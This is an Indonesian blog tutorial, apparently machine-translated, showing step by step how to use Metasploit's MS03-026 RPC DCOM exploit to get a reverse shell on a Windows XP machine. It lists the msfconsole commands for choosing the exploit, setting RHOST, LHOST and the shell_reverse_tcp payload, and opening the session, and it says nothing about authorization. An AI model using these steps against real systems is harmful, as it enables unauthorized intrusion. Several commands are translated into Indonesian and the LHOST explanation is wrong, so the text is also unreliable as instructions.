Cara Mengeksploitasi dan Mendapatkan Akses Jarak Jauh Ke PC Dengan Windows XP

News Portals Tutorial: 16:51 WIB

Pada posting saya kali ini mengenai alat hacking profesional, kami mendownload dan memasang Metasploit, kerangka eksploitasi. Sekarang, kita akan mulai mengeksplorasi Metasploit Framework dan memulai sebuah hack yang teruji dan benar.

Sebelum kita mulai untuk melakukan hacking, mari kita bahas diri kita dengan Metasploit sehingga ketika saya menggunakan istilah tertentu, kita semua memahaminya untuk hal yang sama.

Saat pertama melihat Metasploit Framework, bisa sedikit banyak dengan berbagai antarmuka, pilihan, utilitas, dan modul. Di sini kita akan mencoba membuatnya mudah dimengerti sehingga kita bisa mengeksploitasi pertama kita.

• Terminologi

Ini tidak hanya digunakan dalam Kerangka Metasploit, namun juga dari seluruh komunitas pengujian hacking dan penetrasi profesional. Akibatnya, setiap profesional di bidang ini harus terbiasa dengan persyaratan ini dan dapat juga membedakannya dengan jelas.

• Eksploitasi

Cara penyerang mengambil keuntungan kelemahan atau kerentanan dalam jaringan, aplikasi, atau layanan. Peretas menggunakan kelemahan atau kerentanan ini dengan cara yang tidak diinginkan oleh pengembang atau insinyur agar mencapai hasil yang diinginkan (misalnya akses root). Beberapa eksploitasi yang lebih umum yang mungkin sudah Anda dengar seperti injeksi SQL, buffer overflows, dll.

• Payload

Program atau kode yang dikirimkan ke sistem korban. Metasploit memiliki muatan pra-bangun untuk tujuan ini termasuk dalam Meterpreter yang sangat berguna atau Anda bisa mengembangkannya sendiri. Payload ini dirancang untuk memberi penyerang kemampuan untuk mengelola atau memanipulasi sistem target untuk kebutuhan khusus mereka.

• Shellcode

Seperangkat instruksi yang digunakan sebagai payload waktu eksploitasi terjadi. Shellcode biasanya ditulis dalam bahasa assembly, tapi tidak harus selalu. Ini disebut "shellcode" karena perintah shell atau konsol perintah lainnya diberikan kepada penyerang yang bisa digunakan untuk mengeksekusi perintah di mesin korban.

• Modul

Perangkat lunak yang bisa digunakan oleh Metasploit Framework. Modul ini saling dipertukarkan dan memberi Metasploit kekuatan uniknya. Modul ini mungkin memanfaatkan modul atau modul pelengkap.

• Pendengar

Ini adalah komponen yang mendengarkan koneksi dari sistem hacker ke sistem target. Pendengar hanya menangani hubungan antara sistem ini.

• Petunjuk

Metasploit Framework memiliki ratusan modul dan utilitas lainnya. Akibatnya, Anda tidak akan bisa mengingat semuanya. Untungnya, perintah show bisa mengambil daftar semua modul, pilihan, target, dll dalam kerangka kerja Anda.

Sekarang kita memiliki dasar konsep dan perintah Metasploit, mari kita hack sebuah sistem!

Langkah 1: Buka terminal di Linux

Salah satu hacks yang paling andal adalah sistem Windows XP yang ada di mana-mana dengan RPC DCOM. Ini adalah serangan buffer overflow yang memungkinkan penyerang untuk mengeksekusi kode pilihan mereka di kotak yang dimiliki (perhatikan komentar Microsoft di bawah dampak kerentanan).

Microsoft mengidentifikasinya sebagai MS03-026 dalam database kerentanan mereka. Dalam kasus kami, kami akan menggunakannya untuk membuka shell terbalik pada sistem target kami.

Buka konsol Metasploit:

Msfconsole

Bersabarlah, dibutuhkan beberapa waktu untuk Metasploit memuat semua dari modulnya. Versi Metasploit saat ini memiliki 823 exploits dan 250 payloads.

Langkah 2: Temukan Eksploitasi

Metasploit memungkinkan Anda untuk mencari menggunakan perintah pencarian. Dalam kasus kami, kami mencari eksploitasi DCOM, jadi kami cukup mengetik:

Msf> cari dcom

Langkah 3: Set Exploit

Sekarang mari kita sampaikan Metasploit apa eksploitasi yang ingin kita gunakan.

Ketik pakai dan nama exploit kami, exploit / windows / dcerpc / ms03_026_dcom. Msf> gunakan exploit / windows / dcerpc / ms03_ 026_dcom

Perhatikan bahwa prompt telah berubah dan sekarang mencerminkan eksploitasi yang kami pilih.

Langkah 4: Mengatur Pilihan

Sekarang setelah kita memilih eksploitasi, kita bisa bertanya kepada Metasploit apa pilihan kita. Dengan mengetikkan opsi show, Metasploit akan mencantumkan pilihan kita dalam mengeksekusi eksploitasi ini.

Msf> tampilkan pilihan

Langkah 5: Setel Remote Host

Metasploit sekarang akan meminta kami untuk RHOST. Ini akan menjadi alamat IP dari host remote atau mesin yang kita serang. Dalam kasus kami, ini adalah 10.0.0.3. Gunakan alamat IP sebenarnya dari mesin yang Anda serang. Alat seperti nmap dapat membantu mengidentifikasi alamat IP dari mesin yang Anda serang. Perhatikan pada gambar di atas bahwa Metasploit mengatakan bahwa kita akan menggunakan (mengikat) port 135.

Msf> setel RHOST 10.0.0.3

Langkah 6: Tampilkan Payloads

Selanjutnya, memeriksa untuk melihat muatan apa yang tersedia dari eksploitasi ini.

Ketik show payback pada prompt Metasploit:

Msf> menunjukkan payloads

Langkah 7: Set Payload

Sekarang kita bisa melihat muatan apa yang tersedia, kita bisa memilih generic / shell_reverse_tcp dengan menggunakan perintah set konsol Metasploit.

Jika berhasil, ini akan membuat remote shell pada sistem target yang bisa kita komando.

Msf> setel PAYLOAD generic / shell_reverse_tcp

Langkah 8: Setel Host Lokal

Sekarang setelah kita memilih eksploitasi dan muatan, kita perlu memberi tahu Metasploit alamat IP mesin penyerang kita. Dalam contoh ini, sistem target kami memiliki alamat IP 10.0.0.6. Gunakan alamat IP sebenarnya dari sistem yang Anda serang. Alat seperti nmap, dapat membantu Anda mendapatkan alamat IP.

Msf> set LHOST 10.0.0.6

Langkah 9: Eksploitasi

Sekarang kita perintah Metasploit untuk mengeksploitasi sistem:

Msf> mengeksploitasi

Langkah 10: Buka Shell pada Sistem Hacked

Ketik sesi perintah -i 1 untuk membuka shell perintah pada sistem XP yang akan muncul di konsol Metasploit Anda.

Sesi -i 1

Untuk mengkonfirmasi bahwa shell perintah ada pada sistem Windows XP, ketik dir untuk mendapatkan daftar direktori pada sistem Windows XP yang Anda miliki sekarang!

C:> dir

Selamat! Anda baru saja meng-hack sistem pertama Anda dalam menggunakan Metasploit!

Comments

Popular Posts